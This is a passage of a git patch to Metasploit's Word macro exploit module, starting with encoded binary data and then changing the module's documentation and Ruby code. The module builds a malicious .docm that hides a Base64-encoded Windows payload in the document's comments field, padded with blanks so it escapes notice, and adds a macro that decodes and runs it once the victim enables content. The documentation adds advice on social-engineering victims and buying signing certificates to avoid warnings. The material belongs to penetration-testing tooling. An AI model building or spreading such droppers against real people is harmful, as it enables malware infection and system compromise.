zw~bz6y4EiJtA=rQL!2_`_@p8m4+rQg5%E^dcqyVD1Lyt-8aTU9#tnQq@B_g0IuJe0 z^z-U~Ivf0}@bR3U;3W0eKY?HbVVd`{IBchV{^z&GbO(+&KPftP`PY!?0kXhz!LDS-~Wq~nSk zA0uZBT!zD0@L)nFj~#CZGuk+#4%Ot;c=WO8)bm0QODUFxkI$5Y@hX9{DRn+QcL|(5 zyq!!dchZ_$4CnQ6U8c2|1U+xyT-K{Po-1Q6oHFQ3$U|qQ=$J3OUm9|3I&Sr%?ZUvh z?LmWw+a6;)OE)-gDf(?(=h5`}kj}%UnB$@p!DYPnGGz~4E4_3c-Kvzq zS=PgIA7jCDCpcprV7e71a13-^p9^RlIIj`-vd3rmLuI^NB35D?(Tk{O5b-VamXby+ zOM;qY3D0ZgWwciQIA|Q0x{PwA6PTsG=*S3rcXH?vgT79F66?ou`W0qz1vNq+1fI)b z5=eOW;GHBvW%6%8_sCaKi>DPST9AILm2cA9r|21N6`DZZd8XWk*n?P>UeH#mDBhiT ze@J;1PrV%i@mV^71CG8xJQPcYB0C-Jp|IMgeeHG+veRriZ9oYQxERg8~HoYPC<{8 z*K;?zUdOyznl8T==_lZS+oD(2(HB(1Ve}!_&+FNWCkJjPxBnrfQzM*!7OH_@RM-V| z%JU!rYq7XP#3qu#Xhf`>ha;U9j{~{&_HlkI^1lvnkZ4r{(IGV<{9@3bP-`09LX9wG zNFpjaQ3cG8wzJ zwsvf6%rO#8Mh8PlM7mWNZ$nS90A%7wo-i^{@@#tV!9T8)pWKgsO0%{@wsY9Xy zniccMRnh8C`niG?qH=wtFBz|*hpgKAi~7h={Vd%d(d8%QA=IBgi1hkyhrBpok9@aAVQzc`qC8$t&O)-l zJM;3v*&`^2*8`qY)BEjeybp;$&>!~)l4@M6kBI4=2svgiLI?u);~~iBa=4$KBoBCY z%X767dG)|YC+flLSx~FTZmgGgVBT^H^XF>(i%}QW11I`pJC2rE#ypMZz&)J*39QHS z!MhxA0(D>6$sF7wZV9i*790w1ZCy?uhU{z(%d8x{!kv?na{-=NIUZq^DP49|)lzQg|mx&=Twegmpiry=OG5>?d>+351@}L7Xn|Iu+)H zpnWtFNQSVm>7GdT!wY*jG#GFUO(3#ky_(qU4+|_fBYvzPEeV0;0t;CcqZ^`;owO52 zib<3X(;nsNJ0Y)#jImwD@dq8y9m+G*l0?-9N0X$A&E6dw{Ubn{g&l_h)a4JvqX~O~ zwS4_B4YjNm{UWGF3IxpCQ8Igsv@YvO#;MOgto0q4ok#5N<=!K+`{W5K(z}n${!1Ah zNN-xvfl>i?U%H^YEu2v21-v&)lvqDpP|!CDAuXfHXm?DtMk=f1k?x3Sqj)?T7dX)I zj;2x@)$ycU)JmZdF&rI@40(3!_J>E+dp=ZC*o5EDHfjqyy{+mcG{R&j)q zvQs4K@Q#MU$RUWVxmYtlqCw<3vu4*Z5 z8&?CV11Hnhb@y!*l{r^#u;sN!bC%s#yd@MFiY^&TJUrJDESwukieG!KdhW)yZ(8Nh zNed-?qlu2H{fjCCskN4>hsOInYEld*qUrTMimU#l3QGffbh6Tpot;cO*QY%P$v36p6r3}^;J`o76rhvKYD_NRBfiPniumvm-9%`tc=U>#Z{E+6I-s1nJ5OY(~ zsgG4wiurY-KPrnew!Wkq6Yhf|M~Kt4kq2Q-fBaYTRoVaDQ*r_=8774K{@auP^ z2b(Gf7WXZ#FL^nCa)rkmiumIbZ(dh**O7HAavxvxN^Wc6&xt)U-m{Iy~rOpvgqWU0c-yanf>-bVDrM=R1z#@il^gH* zE}dRr=~Txnzd^rnyixIjxI$@GK2h0tcJArA*Z0fmBB#A7w)K}J=j3^5*@_;kFBq@% zojzSzXptE+{ps%lek$5k$iuwCi^^C@@qLmKam?=mmkdW zQl7M472nHn^GweIy_)@a58?i%kR}k$mZh-B;$9FGo)!cv^I6msX z6fqhP%AaOXT}sBqV4A~TFNDi0RnN;$8`{rSrFr4tT*`$pZrucDLYQ9u82bOc1>FC7 z&+TXDZii8fAGdNG=5n8=td|?uqplY@{e}q_b3TQsA7nto z4?le&i@!gJH9)&lq(%-T?F9t~V8qG?sBWWnA<8jXcB~^D9rTB#Cv1H&e?Z#R?hh*o zweXWZHbAZZ!Eou)p13-6h(Dt!cl{9knYBMYTI6XPk43>ae=!@AVS=&Rs>VaRrP6X3 zwYZrT%H6ZSMP@y^yzrv`2ijp|KGqWkTZLsxkc3ZcnKnqcY6j=`?f9hSKUj%yk+*4HBO?AgQ)Rlq$VJhXTKmX;)GUDfnMQK z#06V4)ww{n&eF4M&?^no`qS*a8njZ!FW$4N(X-sUzh6Cj@v$`f_F`NDH?Q1U`vms7 zLBeMnG=_B|dn9p3E-QFv>18)=OH9|=_u9*@_qmtbHLYZ8VocMh+ce$mMmyV}Tlhc$ zmG4)YbH#zV!FrsX1NSvGosNP(j(*bho3E1^w@ERV&*`)-n>F`*=~>+gmn5$Tty4GP zcn-`)n~NK*@QZ0-@6;H$kh2{-NGtl^4UMjWwtGQo0agcE9o}jHt!Sq?4_c7Q=G|$PRLl-`E;oS15^rFAWJyxk!TTM z31BI^J&ijvJb=9K>pT91x8QTXBQSYPd%}F@Ske_@+A{+GbJ+!Ls8UTU8lc-vz+8x( z=;KVLO1^NOOolJYYJpYoGuYEI89qOs`C|bVz8Z>lPWWoznM}1j8+Rtd_cu9|u~=N^ z1*_I7sR;xf|J^^iGVfQZP?Yyg_WM=m4@&OK_a8m@_J_TB`|khZiu-=_twOE`>-%$$ z?|E?f@f+scv+7H>iaoF1Y|=UAuYwc+UlfuT$F=vn8OLq<6mFS9ZHEl#mf*g)%Dd3PCTqk9~vMS=VIi(jyj!dV(WTMleLZo*hBg!k1? z;k`uZYVqypZf{@jYumB8t+#J|_r}f+8|5j+j}>a3vf+dRze2!|5I#NtJOxF70NtW} z?bUOX?qOWySFaegQIP^e*tCO_Yd>kDd?VM6Hg+h(dM*0_h>CVyo*m>*?SdRdKP&Jb z<>HNlf$!a7qXOmJ!NH@#hMzbXUhK#ZR@taf(OlKKr~2_H(L~Kby$b~tQw#j)nu~gr z558a7Zo?1hG(YwFh+(ED(aspW)o@nt_-phY;Z$N&{g)e246!Sk<-W0z+ob!W^%J?B z9vjV3*bhCLRNJF*IHI43+Gt)DN%KXIB@Rp6{d`pWtFK{12>#}ueiY(Jv-sKN43G0W z_o9_k&Sf=TH)tap!MSYumf><%ckmI$!|S-ycj$z!(9q9fkT#voRDj!8X0bx_ z(>G!G&8&KNzM>7GAq|CYzmA8;c!%#Wx#=`F$ke)BufXHM-?sxq#ujUr*#)s&<}0Bq zWd+YFEV>+XsKIuuP%)mkwD}$vW4?*SAMDHVoEc`@h-dO#!u$HxX8Y~+P3>-1Y5{Pzuwu4=Juj_G&KmT*B63O~6sh0S6EUBW0| zn5E~%nj~Lem>D`}(BFAZ()h$cxgNj0N4rKaGhh0+&S%mW0TBXQk3nFC<}fqn-$u?B d;L?~inCfrVCur2?_>6ix|L*+yut2ju{{ - \ No newline at end of file diff --git a/documentation/modules/exploit/multi/fileformat/office_word_macro.md b/documentation/modules/exploit/multi/fileformat/office_word_macro.md index 0542810dbc..d36db9836e 100644 --- a/documentation/modules/exploit/multi/fileformat/office_word_macro.md +++ b/documentation/modules/exploit/multi/fileformat/office_word_macro.md @@ -1,13 +1,16 @@ ## Description -This module generates a macro-enabled Microsoft Office Word document. It does not target a specific -CVE or vulnerability, this is more of a feature-abuse in Office, however this type of -social-engineering attack still remains common today. +This module generates a macro-enabled Microsoft Office Word document (docm). It does not target a +specific CVE or vulnerability, instead it's more of a feature-abuse in Office, and yet it's still a +popular type of social-engineering attack such as in ransomware. -There are many ways to create this type of malicious doc. The module injects the Base64-encoded -payload in the comments field, which will get decoded back by the macro and executed as a Windows -executable when the Office document is launched. +By default, the module uses a built-in Office document (docx) as the template. It injects the +Base64-encoded payload into the comments field, which will get decoded back by the macro and executed +as a Windows executable when the Office document is launched. + +If you do not wish to use the built-in docx template, you can also choose your own. Please see more +details below. ## Vulnerable Application @@ -22,58 +25,74 @@ Specifically, this module was tested specifically against: * Microsoft Office 2016. * Microsoft Office Word 15.29.1 (161215). +## Building the Office Document Template + +It is recommended that you build your Office document (docx) template from either one of these +applications: + +* Google Docs +* Microsoft Office Word + +**Google Docs** + +Google Docs is ideal in case you don't have Microsoft Office available. + +Before you start, make sure you have a Gmail account. + +Next, to create a new document, please go to the following: + +[https://docs.google.com/document/?usp=mkt_docs](https://docs.google.com/document/?usp=mkt_docs) + +To save the document as a docx on Google docs: + +1. Click on File +2. Go to Download as +3. Click on Microsoft Word (.docx) + +**Microsoft Office Word** + +If you already have Microsoft Office, you can use it to create a docx file and use it as a template. + + ## Verification Steps +**To use the default template** + 1. ```use exploit/multi/fileformat/office_word_macro``` 2. ```set PAYLOAD [PAYLOAD NAME]``` -3. Configure the rest of the settings accordingly (BODY, LHOST, LPORT, etc) +3. Configure the rest of the settings accordingly (LHOST, LPORT, etc) 4. ```exploit``` 5. The module should generate the malicious docm. +**To use the custom template** + +1. ```use exploit/multi/fileformat/office_word_macro``` +2. ```set PAYLOAD [PAYLOAD NAME]``` +3. ```set CUSTOMTEMPLATE [DOCX PATH]``` +4. Configure the rest of the settings accordingly +5. ```exploit``` +6. The module should generate the malicious docm. + ## Options -**BODY** Text to put in the Office document. See **Modification** below if you wish to modify more. - -## Demo - -In this example, first we generate the malicious docm exploit, and then we set up a -windows/meterpreter/reverse_tcp handler to receive a session. Next, we copy the docm -exploit to a Windows machine with Office 2013 installed, when the document runs the -macro, we get a session: - -![macro_demo](https://cloud.githubusercontent.com/assets/1170914/22602348/751f9d66-ea08-11e6-92ce-4e52f88aaebf.gif) - -## Modification - -To use this exploit in a real environment, you will most likely need to modify the docm content. -Here's one approach you can do: - -1. Use the module to generate the malicious docm -2. Copy the malicious docm to the vulnerable machine, and edit it with Microsoft Office (such as 2013). - When you open the document, the payload will probably do something on your machine. It's ok, - since you generated it, it should not cause any problems for you. -3. Save the doc, and test again to make sure the payload still works. - -While editing, you should avoid modifying the following unless you are an advanced user: - -* The comments field. If you have to modify this, make sure to create 55 empty spaces - in front of the payload string. The blank space is for making the payload less obvious - at first sight if the user views the file properties. -* The VB code in the macro. +**CUSTOMTEMPLATE** A docx file that will be used as a template to build the exploit. ## Trusted Document By default, Microsoft Office does not execute macros automatically unless it is considered as a trusted document. This means that if a macro is present, the user will most likely need to manually -click on the "Enable Content" button in order to run the macro. +click on the "Enable Content" or "Enable Macro" button in order to run the macro. Many in-the-wild attacks face this type of challenge, and most rely on social-engineering to trick the user into allowing the macro to run. For example, making the document look like something written from a legit source, such as [this attack](https://motherboard.vice.com/en_us/article/these-hackers-cleverly-disguised-their-malware-as-a-document-about-trumps-victory). -To truly make the macro document to run without any warnings, you must somehow figure out a way to +To truly make the macro document run without any warnings, you must somehow figure out a way to sign the macro by a trusted publisher, or using a certificate that the targeted machine trusts. +If money is not an issue, you can easily buy a certificate on-line: +[https://www.sslshopper.com/microsoft-vba-code-signing-certificates.html](https://www.sslshopper.com/microsoft-vba-code-signing-certificates.html) + For testing purposes, another way to have a certificate is to create a self-signed one using Microsoft Office's SELFCERT.exe utility. This tool can be found in the following path on Windows: diff --git a/modules/exploits/multi/fileformat/office_word_macro.rb b/modules/exploits/multi/fileformat/office_word_macro.rb index 8c1313b9ce..adf1c9af59 100644 --- a/modules/exploits/multi/fileformat/office_word_macro.rb +++ b/modules/exploits/multi/fileformat/office_word_macro.rb @@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Microsoft Office Word Malicious Macro Execution", 'Description' => %q{ - This module generates a macro-enabled Microsoft Office Word document. The comments - metadata in the data is injected with a Base64 encoded payload, which will be + This module injects a malicious macro into a Microsoft Office Word document (docx). The + comments field in the metadata is injected with a Base64 encoded payload, which will be decoded by the macro and execute as a Windows executable. For a successful attack, the victim is required to manually enable macro execution. @@ -56,64 +56,226 @@ class MetasploitModule < Msf::Exploit::Remote )) register_options([ - OptString.new("BODY", [false, 'The message for the document body', - 'Contents of this document are protected. Please click Enable Content to continue.' - ]), - OptString.new('FILENAME', [true, 'The Office document macro file', 'msf.docm']) + OptPath.new("CUSTOMTEMPLATE", [false, 'A docx file that will be used as a template to build the exploit']), + OptString.new('FILENAME', [true, 'The Office document macro file (docm)', 'msf.docm']) ]) end + def get_file_in_docx(fname) + i = @docx.find_index { |item| item[:fname] == fname } - def on_file_read(short_fname, full_fname) - buf = File.read(full_fname) - - case short_fname - when /document\.xml/ - buf.gsub!(/DOCBODYGOESHER/, datastore['BODY']) - when /core\.xml/ - p = target.name =~ /Python/ ? payload.encoded : generate_payload_exe - b64_payload = ' ' * 55 - b64_payload << Rex::Text.encode_base64(p) - buf.gsub!(/PAYLOADGOESHERE/, b64_payload) + unless i + fail_with(Failure::NotFound, "This template cannot be used because it is missing: #{fname}") end - # The original filename of __rels is actually ".rels". - # But for some reason if that's our original filename, it won't be included - # in the archive. So this hacks around that. - case short_fname - when /__rels/ - short_fname.gsub!(/\_\_rels/, '.rels') - end - - yield short_fname, buf + @docx.fetch(i)[:data] end + def add_content_type_extension(extension, content_type) + if has_content_type_extension?(extension) + update_content_type("Types//Default[@Extension=\"#{extension}\"]", 'ContentType', content_type) + else + xml = get_file_in_docx('[Content_Types].xml') + types_node = xml.at('Types') - def package_docm(path) - zip = Rex::Zip::Archive.new + unless types_node + fail_with(Failure::NotFound, '[Content_Types].xml is missing the Types node.') + end - Dir["#{path}/**/**"].each do |file| - p = file.sub(path+'/','') + child_data = "" + types_node.add_child(child_data) + end + end - if File.directory?(file) - print_status("Packaging directory: #{file}") - zip.add_file(p) - else - on_file_read(p, file) do |fname, buf| - print_status("Packaging file: #{fname}") - zip.add_file(fname, buf) + def has_content_type_extension?(extension) + xml = get_file_in_docx('[Content_Types].xml') + xml.at("Types//Default[@Extension=\"#{extension}\"]") ? true : false + end + + def add_content_type_partname(part_name, content_type) + ctype_xml = get_file_in_docx('[Content_Types].xml') + types_node = ctype_xml.at('Types') + + unless types_node + fail_with(Failure::NotFound, '[Content_Types].xml is missing the Types node.') + end + + child_data = "" + types_node.add_child(child_data) + end + + def update_content_type(pattern, attribute, new_value) + ctype_xml = get_file_in_docx('[Content_Types].xml') + doc_xml_ctype_node = ctype_xml.at(pattern) + if doc_xml_ctype_node + doc_xml_ctype_node.attributes[attribute].value = new_value + end + end + + def add_rels_relationship(type, target) + rels_xml = get_file_in_docx('_rels/.rels') + relationships_node = rels_xml.at('Relationships') + + unless relationships_node + fail_with(Failure::NotFound, '_rels/.rels is missing the Relationships node') + end + + last_index = get_last_relationship_index_from_rels + relationships_node.add_child("") + end + + def add_doc_relationship(type, target) + rels_xml = get_file_in_docx('word/_rels/document.xml.rels') + relationships_node = rels_xml.at('Relationships') + + unless relationships_node + fail_with(Failure::NotFound, 'word/_rels/document.xml.rels is missing the Relationships node.') + end + + last_index = get_last_relationship_index_from_doc_rels + relationships_node.add_child("") + end + + def get_last_relationship_index_from_rels + rels_xml = get_file_in_docx('_rels/.rels') + relationships_node = rels_xml.at('Relationships') + + unless relationships_node + fail_with(Failure::NotFound, '_rels/.rels is missing the Relationships node') + end + + relationships_node.search('Relationship').collect { |n| + n.attributes['Id'].value.scan(/(\d+)/).flatten.first.to_i + }.max + end + + def get_last_relationship_index_from_doc_rels + rels_xml = get_file_in_docx('word/_rels/document.xml.rels') + relationships_node = rels_xml.at('Relationships') + + unless relationships_node + fail_with(Failure::NotFound, 'word/_rels/document.xml.rels is missing the Relationships node') + end + + relationships_node.search('Relationship').collect { |n| + n.attributes['Id'].value.scan(/(\d+)/).flatten.first.to_i + }.max + end + + def inject_macro + add_content_type_extension('bin', 'application/vnd.ms-office.vbaProject') + add_content_type_partname('/word/vbaData.xml', 'application/vnd.ms-word.vbaData+xml') + + pattern = 'Override[@PartName="/word/document.xml"]' + attribute_name = 'ContentType' + scheme = 'application/vnd.ms-word.document.macroEnabled.main+xml' + update_content_type(pattern, attribute_name, scheme) + + scheme = 'http://schemas.microsoft.com/office/2006/relationships/vbaProject' + fname = 'vbaProject.bin' + add_doc_relationship(scheme, fname) + + @docx << { fname: 'word/vbaData.xml', data: get_vbadata_xml } + @docx << { fname: 'word/_rels/vbaProject.bin.rels', data: get_vbaproject_bin_rels} + @docx << { fname: 'word/vbaProject.bin', data: get_vbaproject_bin} + end + + def get_vbadata_xml + File.read(File.join(macro_resource_directory, 'vbaData.xml')) + end + + def get_vbaproject_bin_rels + File.read(File.join(macro_resource_directory, 'vbaProject.bin.rels')) + end + + def get_vbaproject_bin + File.read(File.join(macro_resource_directory, 'vbaProject.bin')) + end + + def get_core_xml + File.read(File.join(macro_resource_directory, 'core.xml')) + end + + def create_core_xml_file + add_content_type_partname('/docProps/core.xml', 'application/vnd.openxmlformats-package.core-properties+xml') + add_rels_relationship('http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties', 'docProps/core.xml') + @docx << { fname: 'docProps/core.xml', data: Nokogiri::XML(get_core_xml) } + end + + def inject_payload + p = padding = ' ' * 55 + p << Rex::Text.encode_base64(target.name =~ /Python/i ? payload.encoded : generate_payload_exe) + + begin + core_xml = get_file_in_docx('docProps/core.xml') + rescue Msf::Exploit::Failed + end + + unless core_xml + print_status('Missing docProps/core.xml to inject the payload to. Using the default one.') + create_core_xml_file + core_xml = get_file_in_docx('docProps/core.xml') + end + + description_node = core_xml.at('//cp:coreProperties//dc:description') + description_node.content = p + end + + def unpack_docx(template_path) + doc = [] + + Zip::File.open(template_path) do |entries| + entries.each do |entry| + if entry.name.match(/\.xml|\.rels$/i) + content = Nokogiri::XML(entry.get_input_stream.read) + else + content = entry.get_input_stream.read end + + vprint_status("Parsing item from template: #{entry.name}") + + doc << { fname: entry.name, data: content } end end - zip.pack + doc end + def pack_docm + @docx.each do |entry| + if entry[:data].kind_of?(Nokogiri::XML::Document) + entry[:data] = entry[:data].to_s + end + end + + Msf::Util::EXE.to_zip(@docx) + end + + def macro_resource_directory + @macro_resource_directory ||= File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro') + end + + def get_template_path + if datastore['CUSTOMTEMPLATE'] + datastore['CUSTOMTEMPLATE'] + else + File.join(macro_resource_directory, 'template.docx') + end + end def exploit - print_status('Generating our docm file...') - path = File.join(Msf::Config.install_root, 'data', 'exploits', 'office_word_macro') - docm = package_docm(path) + template_path = get_template_path + print_status("Using template: #{template_path}") + @docx = unpack_docx(template_path) + + print_status('Injecting payload in document comments') + inject_payload + + print_status('Injecting macro and other required files in document') + inject_macro + + print_status("Finalizing docm: #{datastore['FILENAME']}") + docm = pack_docm file_create(docm) super end From 04a701dba523ba13eab5e05c6689fb11797dc1be Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 26 May 2017 07:31:34 -0500 Subject: [PATCH 2/2] Check template file extension name --- modules/exploits/multi/fileformat/office_word_macro.rb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/fileformat/office_word_macro.rb b/modules/exploits/multi/fileformat/office_word_macro.rb index adf1c9af59..9e73b887f0 100644 --- a/modules/exploits/multi/fileformat/office_word_macro.rb +++ b/modules/exploits/multi/fileformat/office_word_macro.rb @@ -265,6 +265,11 @@ class MetasploitModule < Msf::Exploit::Remote def exploit template_path = get_template_path + + unless File.extname(template_path).match(/\.docx$/i) + fail_with(Failure::BadConfig, 'Template is not a docx file.') + end + print_status("Using template: #{template_path}") @docx = unpack_docx(template_path) @@ -277,7 +282,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Finalizing docm: #{datastore['FILENAME']}") docm = pack_docm file_create(docm) - super end end